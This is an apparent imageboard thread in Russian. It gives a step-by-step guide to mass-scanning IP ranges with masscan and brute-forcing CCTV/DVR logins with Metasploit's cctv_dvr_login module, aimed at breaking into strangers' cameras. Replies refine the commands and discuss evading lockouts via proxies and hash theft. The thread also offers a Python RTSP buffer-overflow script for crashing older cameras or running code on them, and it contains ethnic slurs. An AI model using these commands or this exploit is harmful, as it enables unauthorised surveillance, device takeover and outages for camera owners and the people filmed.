6) Указываем путь к файлу CIDR блоков (тогда Метасплоит будет искать все сам) или путь к IP с уже готовыми адресами
set RHOSTS file:/opt/Country/UA_IP_CCTV.txt
7) Указывает смотреть все пары
set DB_ALL_CREDS true
8) Указываем колличество потоков
set THREADS 4
(выбирайте столько, каков ваш пинг в те адреса, можно вообще 1 поставить)
9) Запускаем
exploit
) Можно указывать любой порт (даже от HikkVision) ) Где находятся логины и пароли - смотрим в настройках
!) Один украинский фашист репортит камеры Донецка и Луганска, а так же России. Я недавно наткнулся на его кукарек обиженки в группах Метасплоита. Поэтому камерами не ДЕЛИМСЯ !!!
В подарок каждому Python-скрипт для вывода из строя почти любой камеры, выпущенной до 2016 года, путем перегрузки буфера, в тригер пакетах можете писать исполнение любого бинарного файла, у которого у камеры есть доступ
import socket
HOST = 'здесь IP адрес' PORT = 554 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT))
trigger_pkt = "PLAY rtsp://%s/ RTSP/1.0\r\n" % HOST trigger_pkt += "CSeq: 7\r\n" trigger_pkt += "Range: npt=Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9aLSaLSaLS\r\n" trigger_pkt += "User-Agent: VLC media player (LIVE555 Streaming Media v2010.02.10)\r\n\r\n"
Dahua нельзя брутить! После 5 неудачных попыток устройство добавляет тебя в черный лист НАВСЕГДА по MAC и подсети IP! Можно попросить показать хэши паролей и потом на локальной машине подбирать.
Радует, что этот тип камер при бруте банит тебя и пароль админа выпросить нельзя, только восстановить хэши. Что отобьет сразу каклопидоров и толпы ньюфагов + у админ только локальный, оператор не может сменить себе пароль.
>>95340 В прошивках старше 2014 антибрут на телнете тоже, после 5 попыток у Дахуя ты не сможешь больше брутить телнет, тайм аут 24 часа, а если будешь пытаться брутить в этот период - полный бан по маку и твоей подсети.
+ есть еще умная система - защита от дурака, если ты будешь пытаться брутить локальные логины (не буду писать какие они для каждой камеры) - ты через 5 попыток ловишь бан навсегда.
Кстати, это ахуенная тема, что у привилигированного юзера есть вход только с локалки, а удаленка - только у оператора (и поменять пароли нельзя через интернет)
>>95347 >полный бан по маку Мак адрес - это канальный уровень, он в ip-пакетах не передаётся >и твоей подсети. у меня много проксей, лул. Да и брудить я буду только те, на которых не отработают експлоиты.
Ты слишком молод, и не знаешь, что Мак ОС отдаст и явасриптом даже. Подними сам свой NVR-сервер, попробуй побрутить метсплоитом и без стеснений покажи лог.
Не удивляйся, если в момент подключения метасплоитом, разрядность системы будет тоже передаваться.
>>95497 >что Мак ОС отдаст и явасриптом даже >http://javascript.ru/unsorted/ID Ой, кажется ты обкакунькался. >подними сам свой NVR-сервер, попробуй побрутить метсплоитом и без стеснений покажи лог. Грамотные люди пишут брут сами себе. Причем наиболее эффективно перебирать не пароли, а ип-адреса камер, т.е. берётся допустим пара admin//admin и список из 1кк ипов-камер, далее каждый ип из списка тестируется на эту пару. Потом берется другая пара и тд.
>>95503 >>Причем наиболее эффективно перебирать не пароли, а ип-адреса камер, т.е. берётся допустим пара admin//admin и список из 1кк ипов-камер, далее каждый ип из списка тестируется на эту пару. Потом берется другая пара и тд.
set LOGINS set USERS
Ты не осилил, дальше можно не читать. Но внезапно.
>перебирать не пароли >допустим пара admin//admin
Удваиваю тебя, чтоб другие тоже посмеялись.
Короче, учишься вводить в линуксе --help А потом в местасплоите SHOW OPTIONS и SHOW ACTIONS
Когда осилишь, берешь молоток и ебашишь себя по черепу.
>>98413 ооо, знаю эту камеру, жаль только что она слетела с того айпишника, а снова она никак не попадается в мои сети, но нечего, страна не очень большая, попадется рано или поздно
>>95128 (OP) >Нам понадобиться: >Kali Linux >Или PentestBox with Metasploit для Windows Зачем нужен этот Kali Linux? Кому надо сами установят Metasploit Framework. Раньше был ZverCD теперь Kali Linux, пиздец. Для Windows он готовый есть http://windows.metasploit.com/metasploitframework-latest.msi без всяких Pentest Box. >ПО для просмотра на Андроиде, Винде, Маке и т.д. И где твое ПО? http://vmddns.com/download/VMDVR_VMCMS_1.0.0.32.exe — не удается получить доступ к сайту. >Для своей страны А не для своей страны нельзя? >Фильтруем онлайн все IP из текста Уноси это говно обратно. Не работает с большими объемами данных. Знающие делают так grep -E -o "([01]?[0-9][0-9]?|2[0-4][0-9]|25[0-5])\.([01]?[0-9][0-9]?|2[0-4][0-9]|25[0-5])\.([01]?[0-9][0-9]?|2[0-4][0-9]|25[0-5])\.([01]?[0-9][0-9]?|2[0-4][0-9]|25[0-5])" myscan.txt > IP.txt >pool /root/cctv.log Две ошибки. Не pool а spool, путь до файла должен быть заключен в одинарные кавычки spool 'C:\metasploit-framework\bin\console.log' >set RHOSTS file:/opt/Country/UA_IP_CCTV.txt Аналогично сказанному. Путь до файла должен быть заключен в одинарные кавычки. >(выбирайте столько, каков ваш пинг в те адреса, можно вообще 1 поставить) Ты че ебанутый?! У меня 10000 IP я их что все пинговать буду? А когда выяснится что пинг до всех разный тогда что? Ебать дебил… >exploit Нет. run
Вот такие долбаебы создают треды.
Чтобы модуль auxiliary/scanner/misc/cctv_dvr_login нормально работал в Metasploit Framework под Windows:
spool 'C:\metasploit-framework\bin\console.log' use auxiliary/scanner/misc/cctv_dvr_login set BLANK_PASSWORDS true set DB_ALL_PASS true set DB_ALL_USERS true set RHOSTS file:'C:\metasploit-framework\bin\IP.txt' set THREADS 16 run
>>ZverCD - мультизагрузочный диск, предназначенный для установки Windows XP SP3 >>Раньше был ZverCD теперь Kali Linux >>Раньше был ZverCD теперь Kali Linux >>Раньше был ZverCD теперь Kali Linux >>Раньше был ZverCD теперь Kali Linux >>Раньше был ZverCD теперь Kali Linux
Зачем я зашел в этот тред, блять пристрелите этого дебила кто-то.
Нам понадобиться:
Kali Linux
https://www.kali.org/downloads/
Или PentestBox with Metasploit для Windows
https://pentestbox.org
ПО для просмотра на Андроиде, Винде, Маке и т.д.
http://www.cctvcamerapros.com/Viewtron-Video-Surveillance-DVR-s/654.htm#software
1) Качается IP_CIDR блоки
http://www.ipaddresslocation.org/ip_ranges/get_ranges.php
Для своей страны
или создаем с помощью Masscan список IP адресов.
masscan --ports 5920 -iL IPrange.txt --rate=50000 -oX CCTV.xml
Фильтруем онлайн все IP из текста
http://www.toolsvoid.com/extract-ip-addresses
Удаляем онлайн дубликаты
http://www.toolsvoid.com/duplicate-lines-remover
2) Запускаем Метасплоит под виндой или линуксом
msfconsole
3) сохраняем лог
pool /root/cctv.log
4) Выбираем модуль
use auxiliary/scanner/misc/cctv_dvr_login
5) Смотрим его опции
show options
6) Указываем путь к файлу CIDR блоков (тогда Метасплоит будет искать все сам) или путь к IP с уже готовыми адресами
set RHOSTS file:/opt/Country/UA_IP_CCTV.txt
7) Указывает смотреть все пары
set DB_ALL_CREDS true
8) Указываем колличество потоков
set THREADS 4
(выбирайте столько, каков ваш пинг в те адреса, можно вообще 1 поставить)
9) Запускаем
exploit
) Можно указывать любой порт (даже от HikkVision)
) Где находятся логины и пароли - смотрим в настройках
!) Один украинский фашист репортит камеры Донецка и Луганска, а так же России. Я недавно наткнулся на его кукарек обиженки в группах Метасплоита. Поэтому камерами не ДЕЛИМСЯ !!!
В подарок каждому Python-скрипт для вывода из строя почти любой камеры, выпущенной до 2016 года, путем перегрузки буфера, в тригер пакетах можете писать исполнение любого бинарного файла, у которого у камеры есть доступ
import socket
HOST = 'здесь IP адрес'
PORT = 554
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
trigger_pkt = "PLAY rtsp://%s/ RTSP/1.0\r\n" % HOST
trigger_pkt += "CSeq: 7\r\n"
trigger_pkt += "Range: npt=Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9aLSaLSaLS\r\n"
trigger_pkt += "User-Agent: VLC media player (LIVE555 Streaming Media v2010.02.10)\r\n\r\n"
s.sendall(trigger_pkt)
print "Packet sent"
data = s.recv(1024)
print 'Received', repr(data), "\r\n"
s.close()